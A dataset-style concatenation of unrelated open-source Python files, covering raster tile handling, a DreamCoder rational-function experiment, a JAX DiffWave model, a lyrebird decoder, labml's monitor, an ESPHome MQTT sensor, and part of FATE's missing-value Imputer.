raster datasets are non-overlapping apart from deliberately duplicated
margins.
"""
return [self.downloads_for(tile)]
def srs(self):
return srs.wgs84()
def filter_type(self, src_res, dst_res):
# seems like GRA_Lanczos has trouble with nodata, which is causing
# "ringing" near the edges of the data.
return gdal.GRA_Bilinear if src_res > dst_res else gdal.GRA_Cubic
def _parse_bbox(self, ns_deg, is_ns, ew_deg, is_ew, res):
bottom = int(ns_deg)
left = int(ew_deg)
if is_ns == 'S':
bottom = -bottom
if is_ew == 'W':
left = -left
b = BoundingBox(left, bottom, left + 30, bottom + 20)
return b
def create(options):
return GMTED(options)
|
bin/rational.py
|
Dragon-hxl/LARC
| 290 |
78237
|
<gh_stars>100-1000
import datetime
import os
import random
try:
import binutil # required to import from dreamcoder modules
except ModuleNotFoundError:
import bin.binutil # alt import if called as module
from dreamcoder.dreamcoder import explorationCompression, commandlineArguments
from dreamcoder.domains.arithmetic.arithmeticPrimitives import real, real_division, real_addition, real_multiplication
from dreamcoder.grammar import Grammar
from dreamcoder.program import Primitive, Abstraction, Application
from dreamcoder.recognition import ImageFeatureExtractor
from dreamcoder.task import DifferentiableTask, squaredErrorLoss
from dreamcoder.type import arrow, treal
from dreamcoder.utilities import testTrainSplit, eprint, numberOfCPUs
def makeTask(name, f, actualParameters):
xs = [x / 100. for x in range(-500, 500)]
maximum = 10
N = 50
inputs = []
outputs = []
for x in xs:
try:
y = f(x)
except BaseException:
continue
if abs(y) < maximum:
inputs.append(float(x))
outputs.append(float(y))
if len(inputs) >= N:
ex = list(zip(inputs, outputs))
ex = ex[::int(len(ex) / N)][:N]
t = DifferentiableTask(name,
arrow(treal, treal),
[((x,),y) for x, y in ex],
BIC=1.,
restarts=360, steps=50,
likelihoodThreshold=-0.05,
temperature=0.1,
actualParameters=actualParameters,
maxParameters=6,
loss=squaredErrorLoss)
t.f = f
return t
return None
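# Example (illustrative, following the sampling above): makeTask("x + 1.0", lambda x: x + 1.0, 1)
# builds a DifferentiableTask from 50 (input,) -> output pairs drawn from x in [-5, 5),
# and returns None if fewer than 50 sample points stay within |y| < 10.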
def randomCoefficient(m=5):
t = 0.3
f = t + (random.random() * (m - t))
if random.random() > 0.5:
f = -f
f = float("%0.1f" % f)
return f
def randomOffset():
c = randomCoefficient(m=2.5)
def f(x): return x + c
name = "x + %0.1f" % c
return name, f
def randomPolynomial(order):
coefficients = [randomCoefficient(m=2.5) for _ in range(order + 1)]
def f(x):
return sum(c * (x**(order - j)) for j, c in enumerate(coefficients))
name = ""
for j, c in enumerate(coefficients):
e = order - j
if e == 0:
monomial = ""
elif e == 1:
monomial = "x"
else:
monomial = "x^%d" % e
if j == 0:
coefficient = "%0.1f" % c
else:
if c < 0:
coefficient = " - %.01f" % (abs(c))
else:
coefficient = " + %.01f" % c
name = name + coefficient + monomial
return name, f
def randomFactored(order):
offsets = [randomCoefficient(m=5) for _ in range(order)]
def f(x):
p = 1.
for o in offsets:
p = p * (x + o)
return p
name = ""
for c in offsets:
if c > 0:
name += "(x + %0.1f)" % c
else:
name += "(x - %0.1f)" % (abs(c))
return name, f
def randomRational():
no = random.choice([0, 1])
nn, n = randomPolynomial(no)
nf = random.choice([1, 2])
dn, d = randomFactored(nf)
def f(x): return n(x) / d(x)
if no == 0:
name = "%s/[%s]" % (nn, dn)
else:
name = "(%s)/[%s]" % (nn, dn)
return name, f, no + 1 + nf
def randomPower():
e = random.choice([1, 2, 3])
c = randomCoefficient()
def f(x):
return c * (x**(-e))
if e == 1:
name = "%0.1f/x" % c
else:
name = "%0.1f/x^%d" % (c, e)
return name, f
def prettyFunction(f, export):
import numpy as np
n = 200
dx = 10.
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plot
figure = plot.figure()
plot.plot(np.arange(-dx, dx, 0.05),
[0.5*f(x/2) for x in np.arange(-dx, dx, 0.05)],
linewidth=15,
color='c')
plot.ylim([-dx,dx])
plot.gca().set_xticklabels([])
plot.gca().set_yticklabels([])
for tic in plot.gca().xaxis.get_major_ticks():
tic.tick1On = tic.tick2On = False
# plot.xlabel([])
#plot.yticks([])
#plot.axis('off')
plot.grid(color='k',linewidth=2)
plot.savefig(export)
print(export)
plot.close(figure)
def drawFunction(n, dx, f, resolution=64):
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plot
from PIL import Image
figure = plot.figure()
plot.plot(np.arange(-dx, dx, 0.05),
[f(x) for x in np.arange(-dx, dx, 0.05)],
linewidth=20)
plot.ylim([-10, 10])
plot.axis('off')
figure.canvas.draw()
data = np.frombuffer(figure.canvas.tostring_rgb(), dtype=np.uint8)
data = data.reshape(figure.canvas.get_width_height()[::-1] + (3,))
data = data[:, :, 0]
data = 255 - data
data = data / 255.
# print "upper and lower bounds before
# resizing",np.max(data),np.min(data),data.dtype
data = np.array(Image.fromarray(data).resize(size=(resolution, resolution), resample=Image.BICUBIC).getdata()).reshape((resolution, resolution))
# print "upper and lower bounds after
# resizing",np.max(data),np.min(data),data.dtype
plot.close(figure)
return data
def makeTasks():
tasks = []
tasksPerType = 35
ts = []
while len(ts) < tasksPerType:
n, f = randomOffset()
if makeTask(n, f, 1) is None:
continue
ts.append(makeTask(n, f, 1))
tasks += ts
for o in range(1, 5):
ts = []
while len(ts) < tasksPerType:
n, f = randomPolynomial(o)
if makeTask(n, f, o + 1) is None:
continue
ts.append(makeTask(n, f, o + 1))
tasks += ts
ts = []
while len(ts) < tasksPerType * 3:
n, f, df = randomRational()
if makeTask(n, f, df) is None:
continue
ts.append(makeTask(n, f, df))
tasks += ts
ts = []
while len(ts) < tasksPerType:
n, f = randomPower()
if makeTask(n, f, 1) is None:
continue
ts.append(makeTask(n, f, 1))
tasks += ts
return tasks
class RandomParameterization(object):
def primitive(self, e):
if e.name == 'REAL':
return Primitive(str(e), e.tp, randomCoefficient())
return e
def invented(self, e): return e.body.visit(self)
def abstraction(self, e): return Abstraction(e.body.visit(self))
def application(self, e):
return Application(e.f.visit(self), e.x.visit(self))
def index(self, e): return e
RandomParameterization.single = RandomParameterization()
class FeatureExtractor(ImageFeatureExtractor):
special = 'differentiable'
def __init__(self, tasks, testingTasks=[], cuda=False, H=64):
self.recomputeTasks = True
super(FeatureExtractor, self).__init__(inputImageDimension=64,
channels=1)
self.tasks = tasks
def featuresOfTask(self, t):
return self(t.features)
def taskOfProgram(self, p, t):
p = p.visit(RandomParameterization.single)
def f(x): return p.runWithArguments([x])
t = makeTask(str(p), f, None)
if t is None:
return None
t.features = drawFunction(200, 5., t.f)
delattr(t, 'f')
return t
def demo():
from PIL import Image
os.system("mkdir -p /tmp/rational_demo")
for j, t in enumerate(makeTasks()): # range(100):
name, f = t.name, t.f
prettyFunction(f, f"/tmp/rational_demo/{name.replace('/','$')}.png")
print(j, "\n", name)
a = drawFunction(200, 5., f, resolution=32) * 255
Image.fromarray(a).convert('RGB').save("/tmp/rational_demo/%d.png" % j)
assert False
#demo()
def rational_options(p):
p.add_argument("--smooth", action="store_true",
default=False,
help="smooth likelihood model")
if __name__ == "__main__":
import time
arguments = commandlineArguments(
featureExtractor=FeatureExtractor,
iterations=6,
CPUs=numberOfCPUs(),
structurePenalty=1.,
recognitionTimeout=7200,
helmholtzRatio=0.5,
activation="tanh",
maximumFrontier=5,
a=3,
topK=2,
pseudoCounts=30.0,
extras=rational_options)
primitives = [real,
# f1,
real_division, real_addition, real_multiplication]
baseGrammar = Grammar.uniform(primitives)
random.seed(42)
tasks = makeTasks()
smooth = arguments.pop('smooth')
for t in tasks:
t.features = drawFunction(200, 10., t.f)
delattr(t, 'f')
if smooth:
t.likelihoodThreshold = None
eprint("Got %d tasks..." % len(tasks))
test, train = testTrainSplit(tasks, 100)
random.shuffle(test)
test = test[:100]
eprint("Training on", len(train), "tasks")
if False:
hardTasks = [t for t in train
if '/' in t.name and '[' in t.name]
for clamp in [True, False]:
for lr in [0.1, 0.05, 0.5, 1.]:
for steps in [50, 100, 200]:
for attempts in [10, 50, 100, 200]:
for s in [0.1, 0.5, 1, 3]:
start = time.time()
losses = callCompiled(
debugMany, hardTasks, clamp, lr, steps, attempts, s)
losses = dict(zip(hardTasks, losses))
failures = 0
for t, l in sorted(
losses.items(), key=lambda t_l: t_l[1]):
# print t,l
if l > -t.likelihoodThreshold:
failures += 1
eprint("clamp,lr,steps, attempts,std",
clamp, lr, steps, attempts, s)
eprint(
"%d/%d failures" %
(failures, len(hardTasks)))
eprint("dt=", time.time() - start)
eprint()
eprint()
assert False
timestamp = datetime.datetime.now().isoformat()
outputDirectory = "experimentOutputs/rational/%s"%timestamp
os.system("mkdir -p %s"%outputDirectory)
explorationCompression(baseGrammar, train,
outputPrefix="%s/rational"%outputDirectory,
evaluationTimeout=0.1,
testingTasks=test,
**arguments)
|
autoregressive_diffusion/experiments/audio/arch/diff_wave.py
|
xxdreck/google-research
| 23,901 |
78267
|
<filename>autoregressive_diffusion/experiments/audio/arch/diff_wave.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DiffWave architecture.
Ported from PyTorch to JAX from
https://github.com/philsyn/DiffWave-unconditional/blob/master/WaveNet.py
"""
from typing import Any, Callable, Iterable, Optional, Tuple
from flax import linen as nn
import jax
from jax import numpy as jnp
import numpy as np
from autoregressive_diffusion.model.architecture_components import input_embedding
from autoregressive_diffusion.model.architecture_components import layers
Array = jnp.ndarray
Shape = Iterable[int]
Dtype = Any
PRNGKey = Array
InitializerFn = Callable[[PRNGKey, Shape, Dtype], Array]
class ResBlock(nn.Module):
"""Step-conditioned Residual block."""
features: int
kernel_size: Tuple[int] = (3,)
kernel_dilation: Tuple[int] = (1,)
skip_features: Optional[int] = None
kernel_init: InitializerFn = nn.initializers.kaiming_normal()
activation: Callable[[Array], Array] = jax.nn.swish
is_causal: bool = False
@nn.compact
def __call__(self, x, t_embed):
"""Apply the residual block.
Args:
x: Inputs of shape [batch, <spatial>, features].
t_embed: Embedded time steps of shape [batch, dim].
Returns:
Mapped inputs of shape [batch, <spatial>, features] for the output and
skip connections.
"""
in_features = x.shape[-1]
if in_features != self.features:
raise ValueError(
          f'DiffWave ResBlock requires the same number of input ({in_features}) '
          f'and output ({self.features}) features.')
h = x
if t_embed is not None:
# Project time step embedding.
t_embed = nn.Dense(
in_features,
name='step_proj')(
self.activation(t_embed))
# Reshape to [batch, 1, ..., 1, in_features] for broadcast.
t_embed = jnp.reshape(
t_embed,
(-1,) + (1,) * len(self.kernel_size) + (in_features,))
h += t_embed
# Dilated gated conv.
u = layers.CausalConv(
self.features,
self.kernel_size,
kernel_dilation=self.kernel_dilation,
kernel_init=self.kernel_init,
padding='VALID' if self.is_causal else 'SAME',
is_causal=self.is_causal,
name='dilated_tanh')(
h)
v = layers.CausalConv(
self.features,
self.kernel_size,
kernel_dilation=self.kernel_dilation,
kernel_init=self.kernel_init,
padding='VALID' if self.is_causal else 'SAME',
is_causal=self.is_causal,
name='dilated_sigmoid')(
h)
y = jax.nn.tanh(u) * jax.nn.sigmoid(v)
# Residual and skip convs.
residual = nn.Conv(
self.features,
(1,) * len(self.kernel_size),
kernel_init=self.kernel_init,
name='residual')(
y)
skip = nn.Conv(
self.skip_features or self.features,
(1,) * len(self.kernel_size),
kernel_init=self.kernel_init,
name='skip')(
y)
return (x + residual) / np.sqrt(2.), skip
class ResGroup(nn.Module):
"""Residual group with skip connection aggregation and dilation cycling.
Attributes:
num_blocks: Number of residual blocks.
features: Number of ResBlock features.
skip_features: Number of ResBlock skip connection features.
kernel_size: Kernel size for ResBlock-s.
kernel_init: Convolutional kernel initializer.
dilation_cycle: Dilation cycling length.
is_causal: Whether to use a causal architecture.
"""
num_blocks: int
features: int
skip_features: Optional[int] = None
kernel_size: Tuple[int] = (3,)
kernel_init: InitializerFn = nn.initializers.kaiming_normal()
dilation_cycle: int = 12 # Max dilation is 2 ** 11 = 2048.
is_causal: bool = False
@nn.compact
def __call__(self, x, t_embed):
"""Apply a residual group.
Args:
x: Inputs of shape [batch, <spatial>, features].
t_embed: Embedded time steps of shape [batch, dim].
Returns:
Mapped inputs of shape [batch, <spatial>, skip_features]
"""
y = 0.
for i in range(self.num_blocks):
x, skip = ResBlock(
features=self.features,
skip_features=self.skip_features,
kernel_size=self.kernel_size,
kernel_dilation=(2 ** (i % self.dilation_cycle),),
kernel_init=self.kernel_init,
is_causal=self.is_causal)(
x, t_embed)
y += skip
y /= np.sqrt(self.num_blocks)
return y
class DiffWave(nn.Module):
"""DiffWave network architecture.
Attributes:
num_blocks: Number of residual blocks.
features: Number of ResBlock features.
max_time: Number of generation steps (i.e. data dimensionality).
num_classes: Number of output classes.
output_features: Number of output features.
skip_features: Number of ResBlock skip connection features.
kernel_size: Kernel size for ResBlock-s.
kernel_init: Convolutional kernel initializer.
dilation_cycle: ResGroup dilation cycling length.
is_causal: Whether to use the causal architecture.
"""
num_blocks: int
features: int
max_time: int
num_classes: int
output_features: Optional[int] = 1
skip_features: Optional[int] = None
kernel_size: Tuple[int] = (3,)
kernel_init: InitializerFn = nn.initializers.kaiming_normal()
dilation_cycle: int = 12
is_causal: bool = False
@nn.compact
def __call__(self, x, t, mask, train,
context = None):
"""Apply the WaveDiff network.
Args:
x: Inputs of shape [batch, <spatial>, features].
t: Time steps of shape [batch].
mask: Array of the same shape as `x` giving the auto-regressive mask.
      train: If True, the model is run in training mode. *Not* used in this
architecture.
context: Unused.
Returns:
Mapped inputs of shape [batch, <spatial>, skip_features]
"""
assert context is None
# Sinusoidal features + MLP for time step embedding.
# Note: this differs from the DiffWave embedding in several ways:
# * Time embeddings have different dimensionality: 128-512-512
# vs 256-1024-1024.
    # * First convolution has kernel size 3 instead of 1.
h, t_embed = input_embedding.InputProcessingAudio(
num_classes=self.num_classes,
num_channels=self.features,
max_time=self.max_time,
is_causal=self.is_causal)(
x, t, mask, train)
del x, t, mask
h = nn.relu(h)
h = ResGroup(
num_blocks=self.num_blocks,
features=self.features,
skip_features=self.skip_features,
kernel_size=self.kernel_size,
dilation_cycle=self.dilation_cycle,
kernel_init=self.kernel_init,
is_causal=self.is_causal,
name='res_group')(
h, t_embed)
# Final convolution.
h = nn.Conv(
features=self.skip_features or self.features,
kernel_size=(1,) * len(self.kernel_size),
kernel_init=self.kernel_init,
name='flower_conv')(
h)
h = nn.relu(h)
if self.output_features:
h = nn.Conv(
features=self.output_features,
kernel_size=(1,) * len(self.kernel_size),
kernel_init=nn.initializers.zeros,
name='class_conv')(
h)
return h
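# Hypothetical usage sketch (shapes follow the __call__ docstring; the exact input
# handling lives in InputProcessingAudio, which is not shown here, so treat this as
# an assumption rather than a reference invocation):
#
#   model = DiffWave(num_blocks=36, features=256, max_time=16000, num_classes=256)
#   variables = model.init(jax.random.PRNGKey(0), x, t, mask, train=False)
#   out = model.apply(variables, x, t, mask, train=False)
#
# with x of shape [batch, <spatial>, features], t of shape [batch], and mask shaped
# like x.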
|
lyrebird/checker/decoder.py
|
DuXiao1997/lyrebird
| 737 |
78309
|
from lyrebird import application
from .. import checker
class CustomDecoder:
def __call__(self, rules=None, *args, **kw):
def func(origin_func):
func_type = checker.TYPE_DECODER
if not checker.scripts_tmp_storage.get(func_type):
checker.scripts_tmp_storage[func_type] = []
checker.scripts_tmp_storage[func_type].append({
'name': origin_func.__name__,
'func': origin_func,
'rules': rules
})
return origin_func
return func
@staticmethod
def register(func_info):
application.decoder.append(func_info)
@staticmethod
def unregister(func_info):
if func_info in application.decoder:
application.decoder.remove(func_info)
decoder = CustomDecoder()
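# Illustrative usage sketch for the `decoder` instance above (the import path and
# the 'rules' format a real checker script would use are assumptions here):
#
#   @decoder(rules=['example.com'])
#   def my_decoder(flow):
#       ...  # mutate the intercepted flow before other handlers run
#
# The decorated function is queued in checker.scripts_tmp_storage[checker.TYPE_DECODER]
# with its name, callable and rules; CustomDecoder.register/unregister later add it to
# or remove it from application.decoder.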
|
client/labml/internal/monitor/__init__.py
|
elgalu/labml
| 463 |
78325
|
<filename>client/labml/internal/monitor/__init__.py
import typing
from typing import Optional, List, Union, Tuple
from labml.internal.util.colors import StyleCode
from .iterator import Iterator
from .loop import Loop
from .mix import Mix
from .sections import Section, OuterSection
from ..logger import logger_singleton as logger
from ..logger.types import LogPart
from ..tracker import tracker_singleton as tracker
from ...logger import Text
from ...utils.notice import labml_notice
class Monitor:
__loop_indicators: List[Union[str, Tuple[str, Optional[StyleCode]]]]
__is_looping: bool
def __init__(self):
self.__loop: Optional[Loop] = None
self.__sections: List[Section] = []
self.__is_looping = False
self.__loop_indicators = []
self.__is_silent = False
def clear(self):
self.__loop: Optional[Loop] = None
self.__sections: List[Section] = []
self.__is_looping = False
self.__loop_indicators = []
def silent(self, is_silent: bool = True):
self.__is_silent = is_silent
def mix(self, total_iterations, iterators: List[Tuple[str, typing.Sized]],
is_monit: bool):
return Mix(total_iterations=total_iterations,
iterators=iterators,
is_monit=is_monit, logger=self)
def iterate(self, name, iterable: Union[typing.Iterable, typing.Sized, int],
total_steps: Optional[int], *,
is_silent: bool,
is_children_silent: bool,
is_timed: bool,
section: Optional[Section]):
return Iterator(logger=self,
name=name,
iterable=iterable,
is_silent=is_silent,
is_timed=is_timed,
total_steps=total_steps,
is_children_silent=is_children_silent,
is_enumerate=False,
section=section)
def enum(self, name, iterable: typing.Sized, *,
is_silent: bool,
is_children_silent: bool,
is_timed: bool,
section: Optional[Section]):
return Iterator(logger=self,
name=name,
iterable=iterable,
is_silent=is_silent,
is_timed=is_timed,
total_steps=None,
is_children_silent=is_children_silent,
is_enumerate=True,
section=section)
def section(self, name, *,
is_silent: bool,
is_timed: bool,
is_partial: bool,
is_new_line: bool,
is_children_silent: bool,
total_steps: float) -> Section:
if self.__is_looping:
if len(self.__sections) != 0:
is_silent = True
section = self.__loop.get_section(name=name,
is_silent=is_silent,
is_timed=is_timed,
is_partial=is_partial,
total_steps=total_steps,
parents=[s.name for s in self.__sections])
self.__sections.append(section)
else:
if len(self.__sections) > 0:
if self.__sections[-1].is_silent or self.__sections[-1].is_children_silent:
is_silent = True
is_children_silent = True
self.__sections.append(OuterSection(monitor=self,
name=name,
is_silent=is_silent,
is_timed=is_timed,
is_partial=is_partial,
is_new_line=is_new_line,
is_children_silent=is_children_silent,
total_steps=total_steps,
level=len(self.__sections)))
return self.__sections[-1]
def progress(self, steps: float):
if len(self.__sections) == 0:
raise RuntimeError("You must be within a section to report progress")
if self.__sections[-1].progress(steps):
self.__log_line()
def set_successful(self, is_successful=True):
if len(self.__sections) == 0:
raise RuntimeError("You must be within a section to report success")
self.__sections[-1].is_successful = is_successful
self.__log_line()
def loop(self, iterator_: typing.Collection, *,
is_track: bool,
is_print_iteration_time: bool):
if len(self.__sections) != 0:
labml_notice(['LabML Loop: ', ('Starting loop inside sections', Text.key), '\n',
(
'This could be because some iterators crashed in a previous cell in a notebook.',
Text.meta)],
is_danger=False)
err = RuntimeError('Section outside loop')
for s in reversed(self.__sections):
s.__exit__(type(err), err, err.__traceback__)
# raise RuntimeError("Cannot start a loop within a section")
self.__loop = Loop(iterator=iterator_,
monitor=self,
is_track=is_track,
is_print_iteration_time=is_print_iteration_time)
return self.__loop
def start_loop(self):
self.__is_looping = True
tracker().start_loop(self.set_looping_indicators)
def finish_loop(self):
if len(self.__sections) != 0:
raise RuntimeError("Cannot be within a section when finishing the loop")
tracker().finish_loop()
self.__loop = None
self.__is_looping = False
def section_enter(self, section):
if len(self.__sections) == 0:
raise RuntimeError("Entering a section without creating a section.\n"
"Always use logger.section to create a section")
if section is not self.__sections[-1]:
raise RuntimeError("Entering a section other than the one last_created\n"
"Always user with logger.section(...):")
if len(self.__sections) > 1 and not self.__sections[-2].is_parented:
self.__sections[-2].make_parent()
if not self.__is_silent and not self.__sections[-1].is_silent:
logger().log([])
self.__log_line()
def __log_looping_line(self):
parts = [(f"{tracker().global_step :8,}: ", Text.highlight)]
parts += self.__loop.log_sections()
parts += self.__loop_indicators
parts += self.__loop.log_progress()
if not self.__is_silent:
logger().log(parts, is_new_line=False)
def __log_line(self):
if self.__is_looping:
self.__log_looping_line()
return
if len(self.__sections) == 0:
return
parts = self.__sections[-1].log()
if parts is None:
return
if not self.__is_silent:
logger().log(parts, is_new_line=False)
def set_looping_indicators(self, indicators: List[LogPart]):
self.__loop_indicators = indicators
self.__log_looping_line()
def section_exit(self, section):
if len(self.__sections) == 0:
raise RuntimeError("Impossible")
if section is not self.__sections[-1]:
raise RuntimeError("Impossible")
self.__log_line()
self.__sections.pop(-1)
_internal: Optional[Monitor] = None
def monitor_singleton() -> Monitor:
global _internal
if _internal is None:
_internal = Monitor()
return _internal
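# Minimal usage sketch (assumed calling convention, based solely on the signatures
# above; Section's context-manager behaviour is implemented in .sections):
#
#   m = monitor_singleton()
#   with m.section('train', is_silent=False, is_timed=True, is_partial=False,
#                  is_new_line=True, is_children_silent=False, total_steps=100):
#       m.progress(50)        # update the innermost open section
#       m.set_successful()    # mark it successful and re-render the log line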
|
esphome/components/mqtt_subscribe/sensor/__init__.py
|
OttoWinter/esphomeyaml
| 249 |
78353
|
<reponame>OttoWinter/esphomeyaml
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import mqtt, sensor
from esphome.const import (
CONF_QOS,
CONF_TOPIC,
)
from .. import mqtt_subscribe_ns
DEPENDENCIES = ["mqtt"]
CONF_MQTT_PARENT_ID = "mqtt_parent_id"
MQTTSubscribeSensor = mqtt_subscribe_ns.class_(
"MQTTSubscribeSensor", sensor.Sensor, cg.Component
)
CONFIG_SCHEMA = (
sensor.sensor_schema(
MQTTSubscribeSensor,
accuracy_decimals=1,
)
.extend(
{
cv.GenerateID(CONF_MQTT_PARENT_ID): cv.use_id(mqtt.MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
}
)
.extend(cv.COMPONENT_SCHEMA)
)
async def to_code(config):
var = await sensor.new_sensor(config)
await cg.register_component(var, config)
parent = await cg.get_variable(config[CONF_MQTT_PARENT_ID])
cg.add(var.set_parent(parent))
cg.add(var.set_topic(config[CONF_TOPIC]))
cg.add(var.set_qos(config[CONF_QOS]))
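# Example YAML accepted by the schema above (sketch; the `name` key comes from the
# standard sensor schema and `mqtt_parent_id` is auto-generated unless overridden):
#
#   sensor:
#     - platform: mqtt_subscribe
#       name: "Data from topic"
#       topic: the/topic
#       qos: 0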
|
python/federatedml/feature/imputer.py
|
hubert-he/FATE
| 3,787 |
78373
|
<gh_stars>1000+
import copy
import functools
import numpy as np
from federatedml.statistic.data_overview import get_header
from federatedml.statistic.statics import MultivariateStatisticalSummary
from federatedml.util import consts
from federatedml.util import LOGGER
from federatedml.statistic import data_overview
class Imputer(object):
"""
    This class provides basic strategies for value replacement. It can be used for missing-value filling or outlier replacement.
    You can use statistics such as the mean, median or max of each column to fill missing values or replace outliers.
"""
def __init__(self, missing_value_list=None):
"""
Parameters
----------
        missing_value_list: list of str, the values to be replaced. Default None; if None, it is set to the list of blank, none, null and na,
                            which is treated as missing-value filling. Otherwise it is used for outlier replacement, and missing_value_list holds the outlier values
"""
if missing_value_list is None:
self.missing_value_list = ['', 'none', 'null', 'na']
else:
self.missing_value_list = missing_value_list
self.support_replace_method = ['min', 'max', 'mean', 'median', 'quantile', 'designated']
self.support_output_format = {
'str': str,
'float': float,
'int': int,
'origin': None
}
self.support_replace_area = {
'min': 'col',
'max': 'col',
'mean': 'col',
'median': 'col',
'quantile': 'col',
'designated': 'col'
}
self.cols_fit_impute_rate = []
self.cols_transform_impute_rate = []
def get_missing_value_list(self):
return self.missing_value_list
def get_impute_rate(self, mode="fit"):
if mode == "fit":
return list(self.cols_fit_impute_rate)
elif mode == "transform":
return list(self.cols_transform_impute_rate)
else:
raise ValueError("Unknown mode of {}".format(mode))
@staticmethod
def __replace_missing_value_with_cols_transform_value_format(data, transform_list, missing_value_list,
output_format):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = output_format(transform_list[i])
replace_cols_index_list.append(i)
else:
_data[i] = output_format(v)
return _data, replace_cols_index_list
@staticmethod
def __replace_missing_value_with_cols_transform_value(data, transform_list, missing_value_list):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = str(transform_list[i])
replace_cols_index_list.append(i)
return _data, replace_cols_index_list
@staticmethod
def __replace_missing_value_with_replace_value_format(data, replace_value, missing_value_list, output_format):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = output_format(replace_value)
replace_cols_index_list.append(i)
else:
_data[i] = output_format(_data[i])
return _data, replace_cols_index_list
@staticmethod
def __replace_missing_value_with_replace_value(data, replace_value, missing_value_list):
_data = copy.deepcopy(data)
replace_cols_index_list = []
for i, v in enumerate(_data):
if str(v) in missing_value_list:
_data[i] = str(replace_value)
replace_cols_index_list.append(i)
return _data, replace_cols_index_list
def __get_cols_transform_value(self, data, replace_method, quantile=None):
summary_obj = MultivariateStatisticalSummary(data, -1, abnormal_list=self.missing_value_list)
header = get_header(data)
if replace_method == consts.MIN:
cols_transform_value = summary_obj.get_min()
elif replace_method == consts.MAX:
cols_transform_value = summary_obj.get_max()
elif replace_method == consts.MEAN:
cols_transform_value = summary_obj.get_mean()
elif replace_method == consts.MEDIAN:
cols_transform_value = summary_obj.get_median()
elif replace_method == consts.QUANTILE:
if quantile > 1 or quantile < 0:
raise ValueError("quantile should between 0 and 1, but get:{}".format(quantile))
cols_transform_value = summary_obj.get_quantile_point(quantile)
else:
raise ValueError("Unknown replace method:{}".format(replace_method))
cols_transform_value = [round(cols_transform_value[key], 6) for key in header]
return cols_transform_value
def __fit_replace(self, data, replace_method, replace_value=None, output_format=None, quantile=None):
if replace_method is not None and replace_method != consts.DESIGNATED:
cols_transform_value = self.__get_cols_transform_value(data, replace_method, quantile=quantile)
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value_format,
transform_list=cols_transform_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value,
transform_list=cols_transform_value, missing_value_list=self.missing_value_list)
transform_data = data.mapValues(f)
LOGGER.info(
"finish replace missing value with cols transform value, replace method is {}".format(replace_method))
return transform_data, cols_transform_value
else:
if replace_value is None:
raise ValueError("Replace value should not be None")
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value_format,
replace_value=replace_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value, replace_value=replace_value,
missing_value_list=self.missing_value_list)
transform_data = data.mapValues(f)
LOGGER.info("finish replace missing value with replace value {}, replace method is:{}".format(replace_value,
replace_method))
shape = data_overview.get_data_shape(data)
replace_value = [replace_value for _ in range(shape)]
return transform_data, replace_value
def __transform_replace(self, data, transform_value, replace_area, output_format):
if replace_area == 'all':
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value_format,
replace_value=transform_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_replace_value,
replace_value=transform_value, missing_value_list=self.missing_value_list)
elif replace_area == 'col':
if output_format is not None:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value_format,
transform_list=transform_value, missing_value_list=self.missing_value_list,
output_format=output_format)
else:
f = functools.partial(Imputer.__replace_missing_value_with_cols_transform_value,
transform_list=transform_value, missing_value_list=self.missing_value_list)
else:
raise ValueError("Unknown replace area {} in Imputer".format(replace_area))
return data.mapValues(f)
@staticmethod
def __get_impute_number(some_data):
impute_num_list = None
data_size = None
for line in some_data:
processed_data = line[1][0]
index_list = line[1][1]
if not data_size:
data_size = len(processed_data)
                # data_size + 1: the last element of impute_num_list counts the rows in "some_data"
impute_num_list = [0 for _ in range(data_size + 1)]
impute_num_list[data_size] += 1
for index in index_list:
impute_num_list[index] += 1
return np.array(impute_num_list)
def __get_impute_rate_from_replace_data(self, data):
impute_number_statics = data.applyPartitions(self.__get_impute_number).reduce(lambda x, y: x + y)
cols_impute_rate = impute_number_statics[:-1] / impute_number_statics[-1]
return cols_impute_rate
def fit(self, data, replace_method=None, replace_value=None, output_format=consts.ORIGIN, quantile=None):
"""
Apply imputer for input data
Parameters
----------
        data: DTable, each value should be a list
        replace_method: str, the imputation strategy, e.g. min, max, mean or designated. Default None
        replace_value: str, if replace_method is designated, assign the replace_value that will be used to replace the values in missing_value_list
        output_format: str, the output data format. The output data can be 'str', 'int', 'float'. Default origin, the original format as input data
Returns
----------
        fit_data: data_instance, data after imputation
        cols_transform_value: list, the replacement value for each column
"""
if output_format not in self.support_output_format:
raise ValueError("Unsupport output_format:{}".format(output_format))
output_format = self.support_output_format[output_format]
if isinstance(replace_method, str):
replace_method = replace_method.lower()
if replace_method not in self.support_replace_method:
raise ValueError("Unknown replace method:{}".format(replace_method))
elif replace_method is None:
replace_value = '0'
else:
raise ValueError("parameter replace_method should be str or None only")
process_data, cols_transform_value = self.__fit_replace(data, replace_method, replace_value, output_format,
quantile=quantile)
self.cols_fit_impute_rate = self.__get_impute_rate_from_replace_data(process_data)
process_data = process_data.mapValues(lambda v:v[0])
process_data.schema = data.schema
return process_data, cols_transform_value
def transform(self, data, transform_value, output_format=consts.ORIGIN):
